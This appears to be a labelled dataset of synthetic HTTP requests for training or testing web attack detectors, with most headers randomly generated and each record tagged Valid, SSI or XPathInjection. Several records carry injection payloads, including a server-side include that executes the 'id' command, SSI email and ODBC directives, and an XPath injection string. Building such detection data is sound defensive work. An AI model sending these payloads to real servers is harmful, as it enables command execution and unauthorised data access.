GET /iximyieuehdta/jsrteLbn5rkrIh5i/fKp/r9M5zQJEUs/nMIthCXjtq/y4du6V4el8OjP@8GV/irrtte.nsf?nOsloing8ojenuc=ephp6u&mxl4jTe=6923180&AtmlhnRolse=2 HTTP/1.0
Host: 48.40.20.31
Connection: hsqznnt
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 253.123.138.51
Cookie: YusystemNc=evb7WZe
Cookie2: $Version="707"
Date: Mon, 07 Sep 09 01:29:00 GMT
ETag: W/"63D0fXxNEmQl@u3M_yXu"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Wed, 22 Sep 04 05:58:23 GMT
If-Unmodified-Since: Mon, 11 Jul 05 21:45:30 CET
If-Match: "D5cqiDs40v1fT7AVR"
If-None-Match: "kQPmJXw-vFD5ZkDXGzm"
If-Range: Tue, 01 Feb 05 02:21:41 CET
Max-Forwards: 431
MIME-Version: 7.4
Pragma: eso9=c4i
Proxy-Authorization: hnLol ueohtIwr=wHldEo
Authorization: Basic cmE3YUs6ZUxocA==
Range: -5,8-9019,5352-463
Referer: /tidss/0ngpi/wisnbus/juehs.cfm
TE: trailers
Trailer: User-Agent
User-Agent: r4Aeebsaae (nAFKX601Hi; m_ro-_)
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 872x2543
Via: hhs1/0.7 21.184.118.73, HTTP/3.0 218.97.4.28, FTP/1.2 189.185.174.176
Transfer-Encoding: 8ronb
Upgrade: rrn/5.2, rJrm/9.4, str/0.7
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 3151909596780283547
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11859
Start - Id: 19403
class: Valid
GET /ocnesaupnye/d2VgyV5hQUxiEP93VSk/F6-L1V4/h@MkhU/l@HCa5m3oHj/hkf4vj0tXw0Z0e6wZtR/ok2httpsAimg6BCY2.aspx?eodeyka=9975&cpee0dEsxlawees=%3Asotuoi0&sitTetya1h=otxp HTTP/1.0
Host: www.auY9.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate, gzip, compress;q=0.4
Accept-Language: hddlso-j;q=0.9, zndel5w-sr;q=0.0
Cache-Control: min-fresh=7
Client-ip: 62.149.122.148
Cookie: 3ci=aeceIstyleNp iulsa;dwYuswardtgwr=ceodd5wrlnai;zafrntdtoe2hal=etd/m;u4o04=01;orUThkS8=upnatcnst9sSrl
Cookie2: $Version="3"
Date: Sat, 24 May 08 13:17:49 GMT
ETag: W/"un6rCW@GAPiCzDRNfQ"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sat, 03 Oct 09 19:55:53 GMT
If-Unmodified-Since: Sat, 18 Aug 07 21:10:04 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Aug 04 17:28:22 GMT
Max-Forwards: 37
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: Basic Y2RmYXRndHQ6ZWVkdWVz
Range: 512940-12029,467-92321
Referer: /Beaoss/ehRi.gif
TE: deflate;q=0.6
Trailer: Expect
User-Agent: oznnwd (bgqzCf; ae_bqYh-; u4e@bEi-; tDTxqm)
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6070x723
Via: HTTP/4.5 95.41.27.172
Transfer-Encoding: gzip
Upgrade: 0hnhm/0.0
Warning: 515 6.189.134.75 "7iimeytvetemune1t9e" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 5993658067550
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19403
Start - Id: 32633
class: Valid
POST /N8naeoiua0jd6jgslhss/l0Xhlp/tDGrmcC6udaoee/edAwlCeset4gB3X/e56.8X43YZSe@.html? HTTP/1.1
Content-Length: 127
Content-Language: hrna9,lasnrg
Content-Encoding: identity
Content-Location: http://www.udofsttr.cz/qasQxm5/ostaess/eTga.mpeg
Content-MD5: dXBvZGFvZGU0ZXZ1cmhhMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Sep 05 14:41:21 CET
Last-Modified: Sun, 15 Jan 06 16:40:30 CET
Host: www.erNwp.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-greek;q=0.7, cp-932
Accept-Encoding: *
Accept-Language: D-o7oua
Cache-Control: only-if-cached
Client-ip: 222.210.246.119
Cookie: rlacropTns=e ne;AZotmp9isI6u=oIztl<ui |r%e(%te
Cookie2: $Version="643"
Date: Sat, 24 Jun 06 12:37:13 UTC
ETag: "mIeVAW7NphVBy_S"
Expect: ecja
From: thueneui@iqeto5ti.org
If-Modified-Since: Wed, 07 Jun 06 21:51:43 UTC
If-Unmodified-Since: Sat, 27 Aug 05 15:57:04 CET
If-Match: *
If-None-Match: *
If-Range: "@ERZHDMoIFOlu0Z5.U"
Max-Forwards: 1
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=8Ce14fAB
Authorization: Basic Z25naGM6ZXcxZXR0Mg==
Range: -8365,-00217
Referer: http://www.Kmcdre.st/aott/NeNniN5.asp
TE: trailers,gzip;q=0.9,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/2.4 (X11; U; Open BSD i586 0.8; lD-sD; rv:7.6.3) Gecko/18855816
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 3.3 152.86.156.169, weoy/6.8 www.6eoa.js
Transfer-Encoding: compress
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 960 www.0iBqm.htm "egimmrwtfsoosti" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 4855309378866511170
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

mWohiyean5zyell=cIee&stsdeinlldsl=NgnneEcl9oeTLooss&jGHGyaKh1=wL23MoN&5R=7Ra&e1nla=45994&gA3cmdUqDciVV=nenAbosdbgsounda&frVnu=0

End - Id: 32633
Start - Id: 40044
class: SSI
GET /ormz36reuM7/yCnS7Y@BMzne4hxvVJ/sb7d7itrRiy42r0/j9-boot.iniR79vM/1O3bWFMgV7Ttx4a5lsVS/qeJenas2t.nsf?h09onRrt4u8bdo=%29&v07j=%3C%21++++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E HTTP/1.1
Host: www.Oveh.st
Connection: keep-alive
Accept: image/*;q=0.9, image/*;q=0.1, application/x-tar;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate, gzip, compress, deflate;q=0.7
Accept-Language: atni-argo
Cache-Control: min-fresh=093
Client-ip: 216.42.174.149
Cookie: nnootrdztsbynMM=8416739662;fnE_sK_Qpe=tS]nigietttl
Cookie2: $Version="5"
Date: Sat, 06 Mar 04 15:24:42 UTC
ETag: "xJcfFu.TQv6CMJdq7b"
Expect: 100-continue
From: itso@s0eeosrw.st
If-Modified-Since: Wed, 16 Jun 04 05:04:18 GMT
If-Unmodified-Since: Mon, 22 Aug 05 06:58:36 UTC
If-Match: "WhUGiTsZ9g1UeWLh3zWX"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.2
Pragma: a1Iinlh='sytf6P'
Proxy-Authorization: Basic ZmhsdDp1YWx0ZQ==
Authorization: NTLM ajBnZW1kdHRvdW1hYXIxcmFpcGlvYmZPU2NuNnBldHQyMnV5RW9lYTVSbm9yaTN0
Range: 92956-
Referer: http://homcuh.net/oahLi/thttYao/ctiishnt/haak7qdt/Sieuoti.css
TE: trailers
Trailer: If-Range
User-Agent: mt64/4.4
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: HTTP/1.3 www.AhOb.gif, 7.2 60.37.146.74, 9.5 15.57.138.92:71128
Transfer-Encoding: cndi6z; atsbsr9h=kaesyeLg
Upgrade: Reeanu/6.7, rten/3.6, tdg/3.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 02001
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40044
Start - Id: 17224
class: Valid
GET /.MCVatQ28/nT865/XiN3aa0jorAenlT/window.openn/oRLYSYIC7FjkSbreHgh/w2homeedNOLf88/wey/5PE6Dh/f4tuheoO/uisswcv/ilzteA2NybXh1/Pq.YCuAAaccess_loge1-e.cfm?8oesrb=%3Etned&nuojtetecir=o%3EtlogW%3F&rnsDtqltp=484795620&h9=ys+at&daret=hEOyjotKVUz&vv2gxn=757221&Eihmrse5baGsb=tRrot&NJD7-v4eT4Hg=936511395&zyeniaanro2a0=mvWL&sc5KNo=%2FiaA4&1lstshwsans7=56&cLinde=neUp7p HTTP/1.0
Host: 225.60.226.193
Connection: close
Accept: application/*, video/*;q=0.6, application/rtf
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.2, gzip
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 233.150.95.107
Cookie: positionXJechoa-bodykdocumentbetween=40;ymaeoatl3s=2369244;3eamndEmas9l=144847
Cookie2: $Version="665"
Date: Tue, 08 Mar 05 07:00:20 GMT
ETag: W/"0ya8d47sji5TrKx-"
Expect: te8thift
From: tytiiae@0oytu.it
If-Modified-Since: Sun, 20 Mar 05 02:53:15 GMT
If-Unmodified-Since: Wed, 20 Feb 08 15:09:40 CET
If-Match: "@W8OVNUgEEhPI6ojmq-b"
If-None-Match: ".8Q2Y7PQ7yLv@l55"
If-Range: Tue, 22 Mar 05 21:41:05 UTC
Max-Forwards: 962
MIME-Version: 6.4
Pragma: tnnk=e5roero
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: Digest qop=auth
Range: 601-
Referer: /xoompsg/Nebs/eo7pnpo.swf
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: atjegnibotutdhnxueol
UA-CPU: StrongARM
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 0.5 111.239.254.204:338, 7.1 www.bmeuEdu.tiff, 7.4 28.91.114.39:07112
Transfer-Encoding: deflate
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 534738047598763
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17224
Start - Id: 39401
class: SSI
GET /dee7Onefutoe/sE/eUz_8Wc1_/Eadn10ie9te0lEan/3BoLeNJS9/HILK/rc4aTaso/aQhDo/aOerdvwEc7v/lt/uassYTeOrna6/7rt2i.htm?aNdt9rax=%3C%21--%23email+fromhost%3D%22www.m52gah.com%22+tohost%3D%22mailbox.6lfj6.com%22+message%3D%22swo6+oSki72n+hSssaanc+swkgk6%22+fromaddress%3D%22hwtcn.com%22+toaddress%3D%22h6n.nEp9.com%22+subject%3D%22r%22+sender%3D%22pd.com%22+replyto%3D%22tath0.com%22+cc%3D%22nrn%22+inreplyto%3D%22ontae+7ea+st%22+id%3D%22i4tmail%22+--%3E&lda=4Thexp_nbgsoundtsmge&h5nha8mBthset=locationis+eocduLwsam&eP1I2hgcoe0Nb6l=s3%27s&qmrZRCo=nit+trEt3DtlE3s&enKareplacev.=dpf%24samEiqpassthrud0qs&kSrsnodk=31006&ynxmnucs=eMPJM0jxSCFe HTTP/1.1
Host: www.Toidtikoy.cz
Connection: megoi
Accept: image/gif, application/x-tar;q=0.9, video/quicktime
Accept-Charset: windows-1250, x-mac-korean;q=0.0
Accept-Encoding: *
Accept-Language: haes0-h;q=0.9, v-e, mtun-ndtn;q=0.7, ahijd1o-gw;q=0.2, RyHultse-6ste1tnt
Cache-Control: max-stale
Client-ip: 39.14.204.79
Cookie: gPtogetiro3zrmy=ialsam~ihtp L prns4R 
Cookie2: $Version="246"
Date: Tue, 07 Nov 06 17:12:13 CET
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: gdiexzng@dnnsS.com
If-Modified-Since: Wed, 14 Jun 06 01:37:21 GMT
If-Unmodified-Since: Sun, 31 Dec 06 13:21:37 GMT
If-Match: "gNZ_Ka835HCwu_UuQVG"
If-None-Match: "V6Ax6BOcN4gkKlp@Of1"
If-Range: "yYfERM8ixBes9SrIv@"
Max-Forwards: 80
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic ZWVhMjluOmV3Tm0=
Range: 32-500
Referer: /Lerman.css
TE: chunked,deflate,deflate;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 1.2; n0-yw; rv:7.3.5) Gecko/50642736
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 6.3 238.192.7.253, HTTP/7.8 www.tOargdE.jpg, 5idp/7.2 100.159.27.248
Transfer-Encoding: compress
Upgrade: 7soi7/6.3, ehp/7.8, uAdi/5.5, suawe/9.7, pdev/5.3
Warning: 190 www.twedsrAa.js:13 "LwwoTeugDami" 
X-Forwarded-For: 46.100.127.131
X-Serial-Number: 25787238
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39401
Start - Id: 49215
class: XPathInjection
GET /v7s4sA.jpg?FzO0.ntmplZ0=scfmfryorulqgnw&06se=tddqluoan&Qq5OxRVagroup by=03364776&kzuey3=eglcctuSswSpic&drop0PlB-%us7=Ocand%25e&ei0eed=75&LcRewosi=07&rNt=nnMP0A&o90n=Ioaait%27+or+%28i+++++%3C+++++count%28wsoOsr%2Fchild%3A%3Atext%28%29%29+and+++j+%3C++++count%280esr%2Fchild%3A%3Acomment%28%29%29++and+k++++%3C+++++count%28RY%2Fchild%3A%3A*%29+++++%29++++or+++%276eaioo%27++%3D+++%27+++aaevead%27+++++or&Yg7_oZQTnsm=1927&r7Ssb6O=elemrossL6e2r&rftduesNedch0pi=3&ob=ttelnetsiae&elraUWqTnpsgeo=eaXisb_aOSZ&hnN5wsb05=22 HTTP/1.0
Host: 30.76.81.174
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-jp;q=0.2
Accept-Encoding: deflate
Accept-Language: oaceta9p-noxh;q=0.2
Cache-Control: max-age=763
Client-ip: 105.50.230.232
Cookie: Gestset=5;y1yresflnnisnQ=514;tzbottad1AsOOfr=iHhUweei;diirde0e6E=sp\t;sribislarsi5mm=d catd0N;sSEvaeetl=Idhefle
Cookie2: $Version="19"
Date: Mon, 24 Jan 05 08:47:40 GMT
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Fri, 23 Jan 04 17:16:33 UTC
If-Unmodified-Since: Thu, 08 Dec 05 18:15:47 UTC
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Thu, 08 May 08 14:14:29 CET
Max-Forwards: 54
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: negtt esueab=hroeocn
Range: -392691
Referer: /kjcttCv/olhwpuqy/1uinead7.jsp
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: wraoOos/7.0
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: gzip
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49215
Start - Id: 40915
class: SSI
GET /i@ed/6gRmWdprse/jgCOz8meDEx/3xeihBlwdpgletzaeoqe/e9N0GT0Lo7V.DwFRvZ.exe?YF9HX8-hO=%3C%21--++%23odbc+++++statement+++%3D++++%22select++orese%2C++++gaot1aco%2C++iO+++++from+++Hrcm+++order+++by+++4%2C++318%2C+6%22++++--%3E&L0cenzhnm0f=childe0r&Inb=eD&aD4lmn4at=%27Peo HTTP/1.1
Host: www.n3nar.uk
Connection: on3t
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 107.204.228.141
Cookie: 3RfB=cOw
Cookie2: $Version="3"
Date: Thu, 10 Dec 09 02:16:45 GMT
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: rep1c=eqeOqmar;smtnc3
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Mon, 29 Jun 09 19:59:44 UTC
If-Match: *
If-None-Match: "PSEzn77E@@YPz-fz"
If-Range: "krVUjpvr83o77npQSeu1"
Max-Forwards: 7
MIME-Version: 9.9
Pragma: nii=tnieOy
Authorization: Digest algorithm=MD5
Range: 518194-7
Referer: /ul2Ot.png
TE: trailers
Trailer: Accept-Encoding
User-Agent: sE1ori (tpQi6Jnnf; aC8a1a)
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: 9.3 www.reeFohso.htm, 5.5 202.245.151.136:220
Transfer-Encoding: compress
Upgrade: Oeoe/7.5, tls/2.6
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40915
Start - Id: 19537
class: Valid
GET /Rv/ep4ynHSd@F-GSkRP/tGB3/n5wQv/mlooea/alogl1Madminfh/1M@Lu@ZWC/zGwjp-ncV10/nachJdittEte9n/NEty/sN_i5sPhgKC.js?na0=4&ehog=f5n&ineDhs7sti=tua%7CselectsT&7relneia=oRr4&sisnconoitr1=e%2B&edaewrloyewn=g60GU&ne7imit=whereSnt4E%2B&9i=witenIiedoo&hSptwpoeR=t0passwdhathome HTTP/1.1
Host: 86.182.188.124:066
Connection: keep-alive
Accept: application/*, application/*, image/png
Accept-Charset: iso-8859-8-i;q=0.5, big5;q=0.1, x-mac-chinesetrad, gb2312, iso-8859-2;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 64.30.114.227
Cookie: 1ysoithhlnr=acopyt n;qtPon1tOyMnuq3=saOlcdropfl;vsotxDus=$;eeeieadg0enmAu=iano;eAT=iwaoasu  location>ose
Cookie2: $Version="4"
Date: Mon, 15 Jan 07 01:25:06 GMT
ETag: W/"Eqo@DG6OGiwAqoYr8u"
Expect: itetett
From: 2mrraofe@odde.uk
If-Modified-Since: Tue, 20 Mar 07 06:59:19 UTC
If-Unmodified-Since: Mon, 30 Aug 04 03:21:09 UTC
If-Match: "TOAWjmZqsg9VE@COeUMP"
If-None-Match: *
If-Range: Sun, 28 Mar 04 15:53:42 GMT
Max-Forwards: 0415
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: a1qii rdttj=rbie1id
Authorization: NTLM aW9jb2VpZ2hkZW9kcFNtUTl2cDhlZWd2U3lhbXV0Y2Fv
Range: 75-,630738-565437,41-99479
Referer: /gfemeied/4sTouist/soefaFc.jsp
TE: deflate,trailers,deflate;q=0.8
Trailer: If-Match
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 5.3; eo-un; rv:8.6.3) Gecko/15504690
UA-CPU: Sparc
UA-Disp: 146,7651,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 690x0416
Via: hkmo/7.9 159.98.186.1, 2.2 37.192.45.242
Transfer-Encoding: deflate
Upgrade: eLdt/8.1, uyqT/1.9
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 00842
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19537
Start - Id: 14538
class: Valid
GET /4whTR8Q2h/d9hi2g0cos57i/saNq51a9pp3QQqa8tb/ttE24uhoUtmdslpr9s/iH-4aQdAZOBT..php4?aan=nArsop&lmloiaqd5te2oyu=e9hIwRogk6jB&mEhoy2esx=h3iPrvaesam5%40Yttu%5Bc&lash=ps+s HTTP/1.0
Host: www.yn0r.de
Connection: keep-alive
Accept: video/quicktime;q=0.7, text/xml;q=0.1
Accept-Charset: windows-1251;q=0.5
Accept-Encoding: gzip, compress, compress, identity
Accept-Language: 3alr3np-ho, efit-m, ddOe-nednbo
Cache-Control: max-stale
Client-ip: 21.159.6.234
Cookie: ulhhaeLRtlyiboe=wherep;oluhhHuNca=otfAs;pac0=arongmtss4exdli;jUenadOd=dMU1;ham0T=06;nis1llt0y7euwr=010
Cookie2: $Version="8"
Date: Sun, 02 Nov 08 03:41:12 UTC
ETag: "vCcBAqRPR5i-s-_Kr@S"
Expect: dfuOmt=Nehn4
From: izhee@mtbHevOaee.gov
If-Modified-Since: Thu, 24 Nov 05 17:07:20 GMT
If-Unmodified-Since: Thu, 06 Aug 09 01:20:52 CET
If-Match: *
If-None-Match: "hbv3gqbW5Z7KiMSgk.pc"
If-Range: Thu, 28 Oct 04 07:43:17 UTC
Max-Forwards: 2975
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic ZWlyYXRhZW46YW50TWdh
Authorization: NTLM aTc1c2kwb0VsdGhtbzJ1M1dvbmpzc1VyZGV0aGhhcW1kZGVPdGFtMA==
Range: 4019-22,-23,269-5
Referer: /rjh6jrA.avi
TE: gzip,trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 5.5; fj-dh; rv:5.8.9) Gecko/28921642
UA-CPU: x86
UA-Disp: 2949,5264,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3486x145
Via: neodyr/9.7 18.14.183.236:9
Transfer-Encoding: identity
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 202 www.tceh.js "i3meintolnieF2asaend" "Wed, 08 Feb 06 16:32:21 GMT"
X-Forwarded-For: 152.218.118.157
X-Serial-Number: 267686461
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14538
Start - Id: 39200
class: SSI
POST /aSihyRFKZAOozvl4/u_YYj-2Y5meLbC/ekSJOyk8WDv9c43a9j5.asp? HTTP/1.1
Content-Length: 562
Content-Language: dnon,i9,ttnvouo
Content-Encoding: deflate
Content-Location: /eoftp/udei8ba/arut/yiieE.js
Content-MD5: cnd5bHJjcmRRdG51Y2Rkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Mar 10 03:23:05 GMT
Last-Modified: Sun, 29 Oct 06 24:01:12 UTC
Host: www.gOwyc7iret.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-2022-jp, windows-1253;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=583
Client-ip: 214.102.152.111
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Tue, 31 Jan 06 01:11:13 CET
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: 6ikA@Trnnt5erl.uk
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Mon, 05 Feb 07 01:10:42 GMT
If-Match: *
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: "nIPxMLXiobi6t._wG"
Max-Forwards: 1670
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Basic b0Z3aHM6dHJmZGduc2U=
Range: -6444
Referer: http://www.eiIigbrr.gov/uliKtlu.tiff
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.2 (Machintosh; U; Mac OS X 8.0; mu-id; rv:0.5.7) Gecko/63781594
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: oismac
Upgrade: rsq/5.8, einc/6.2, tohA/8.2, cdtd6/5.7
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

di__clinkMQ3P=te1ewn&hchlet8rw6iz=et)lttuielrqs&od=7650764&tstucwpti5Tmt=<!--#email fromhost="www.Pgrelos.com" tohost="mailbox.huS.com" message="p2o4sa 2qthibe gzaisso uwea" fromaddress="ret3e.com" toaddress="oor4.A1Magd.com" subject="t" sender="irin.com" replyto="iCUUio3.com" cc="atb" inreplyto="eoork yOb ern0" id="fo2mail" -->&oadhf=n&c7sraq6r=potheqltCe0aaf&riimdieSpihh=pqHH.Ko3LiGu&bwHeThwnvta=e5OrZsPKRE4&htmhlaf=n6Aec-N2&trrqu6aEnanl9=4211402&nhwUtnIaylb=kL6dlm&sep=ajjIjO4rl1y

End - Id: 39200
Start - Id: 4029
class: Valid
POST /xu3OcykVbiv8b@lrzr/C5aLiR.d/aAog./heyokgi1eitcdisythXo/gnwl/6nne3si0aShiDjw1ks/pR0Ya@ti_QOvyCR8Fe/oinLnhoarsn9dlit0/dlr2TmanxasqdzaEJwyt/ocP9sxgl0uu/embezqymk/rjwm.jpg? HTTP/1.1
Content-Length: 65
Content-Language: wot
Content-Encoding: compress
Content-Location: /dwsos/Aiaittab/tizo.js
Content-MD5: c2ppY2UxbWFlZWxvc2FjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 May 08 14:37:12 UTC
Last-Modified: Fri, 09 Jul 04 20:10:32 UTC
Host: 122.50.32.92
Connection: Aury
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip, compress;q=0.1, compress;q=0.8
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 104.214.235.14
Cookie: tvt0En=id$ ;9df4zfGR7child=rtil
Cookie2: $Version="9"
Date: Tue, 12 Aug 08 19:00:47 CET
ETag: W/"Pfij4Ikho0YboWjeNmon"
Expect: hewnE=1ontatz
From: 2tkuW@goty.fr
If-Modified-Since: Sun, 11 Dec 05 09:29:08 GMT
If-Unmodified-Since: Sun, 06 Jul 08 15:59:19 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Feb 04 13:25:02 CET
Max-Forwards: 9719
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: NTLM ZWFzbnVsb283ckl1YTVhdG5PYXUzbmxlYXVyN25mYW5sb0F0b2ZlczRzaW9pZzFy
Range: 594488-,18747-7796
Referer: /apni/qeTioo/fmqlttca/ie6ils/ssruta71.sh
TE: deflate,trailers
Trailer: Pragma
User-Agent: cogihdraezea
UA-CPU: 68000
UA-Disp: 055,684,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 242x137
Via: HTTP/6.8 www.toe8s.tiff:7980, HTTP/7.4 www.rdlatawm.html, FTP/2.4 www.osjeo.shtml
Transfer-Encoding: ateed; henoHrrc=974c
Upgrade: oeLob/1.5, p4rvo/8.7, r8nc/7.6, akd/5.3, Oa6eds/9.9
Warning: 077 170.228.207.137 "0iuylmonu9ff" 
X-Forwarded-For: 201.143.193.53
X-Serial-Number: 8242203190314
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

ere1smru=8667103&TbBRS.0aG5=h&l8tmlhorINy=49950658&reDetao8r=1053

End - Id: 4029
Start - Id: 31446
class: Valid
GET /eEPkw9/i.N1KVoyXqf86Lm8eH/gm5ktsnrsulEmrlred/gdQ0/eysJv4otelWeee/iakoqeneYeeivta/raa8/pTYAz/edsvzb4lhp/hb-7uDNJtWbbw.eHFAD.js?Gesseb=+kr&eemw0h1n7sy=69741553&Fs4haam=samn98dfrh9&wnOtaTu3se=189359&r4s8nihuas=rUQ-YIV_69RI&desMure1Ia=+&oncriggn=imgl1&cwtjnob=8ar%2Bt HTTP/1.0
Host: 199.85.35.173
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.240.231.143
Cookie: Jas@xtermI=bTofH91gUISV;Istdactn1oo=$taoetajnelo;HLqejEp=Lgs s
Cookie2: $Version="471"
Date: Tue, 27 Jan 04 15:30:49 CET
ETag: W/".7BiS1g@7A@OIIL-E"
Expect: 100-continue
From: vconid@sswn.net
If-Modified-Since: Fri, 11 Feb 05 19:52:17 CET
If-Unmodified-Since: Wed, 18 Apr 07 02:34:00 UTC
If-Match: *
If-None-Match: *
